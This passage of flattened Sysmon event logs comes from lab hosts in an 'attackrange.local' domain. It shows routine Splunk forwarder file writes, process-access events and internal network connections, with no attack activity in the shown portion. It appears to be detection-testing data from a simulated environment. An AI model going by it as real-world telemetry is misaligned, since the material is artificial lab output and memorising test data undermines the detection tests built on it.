Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ECEA9461A10948806661781FB8E1FB2,SHA256=B47C0E2CDAA731C999112513A1C360E774DF1BF3C7433399F5CDE78E864B87E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:21.322{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02A4661A124AF2EA0CEED4A03A3D0AAB,SHA256=311168A0810ADE3D9D4CE7CD6D5C7C96C95DB2AD9D9AEAC4E918470BC8E1446A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806072Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:22.776{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=236090CE0B22C4BF5782261EB9CBB2B7,SHA256=3DC5E4D64C4DB1A870880318E125C3023F72EC5842886E4A7790067ED7B6DC5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:22.539{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=584A2ECFD1AF641152B1951EDA786592,SHA256=0594C17B0D1896C2069894E5950507802787E693BBE9B69D1A39698A2EFA6674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:22.539{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2CE31E3AD68B6B8131C6B5248BF5BED6,SHA256=EE7E1776DCBA93B42FE1B431E68757A247928BE013085433B1C0F295FDA42C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:22.323{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66D00E047BDCD7241373AFC4D3E95614,SHA256=960E3B582EFA0ECC3356B8E7633C234C5E96C0834964559103A0D779B4492DC7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806071Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:20.457{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57158-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000806070Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:20.378{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57157-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806073Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:23.792{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70C96826CF9B3D76E14C5BF6DFAA9077,SHA256=89C14FC94A5A04490EFD4317F636006AE147D6BA9DB122397011294553D5CD46,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:15.709{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50912-false10.0.1.12-8000- 
23542300x80000000000000001046005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:23.324{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54A39CD5DB7A6569916B82986C2517B9,SHA256=28FAB9D5B91688063642FBCF124839DD5ADC42029C60CDB655B669F0385F6F9A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806101Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2D8-60EB-3C79-00000000D001}3396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806100Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806099Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806098Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806097Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806096Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806095Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806094Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806093Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806092Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806091Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F2D8-60EB-3C79-00000000D001}3396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806090Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2D8-60EB-3C79-00000000D001}3396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806089Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.918{0C1E0330-F2D8-60EB-3C79-00000000D001}3396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806088Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.792{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BE9FB731A6326E3C9A49A20FF3EEE10,SHA256=E58DD7F4EF876C69F0DACFB58E4DA5C81C4FD4DB3472345FCF657AB50D502CA9,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001046013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:24.355{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EBC09ECD6322AF706CD424D1FB004E6,SHA256=693FAFD1E9D91AF0DFB4F2C1BFA015AE2A413710D774235C20BB01D47DA4ED4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806087Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.401{0C1E0330-F2D8-60EB-3B79-00000000D001}10563920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806086Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.261{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2D8-60EB-3B79-00000000D001}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806085Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806084Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806083Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806082Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806081Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806080Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 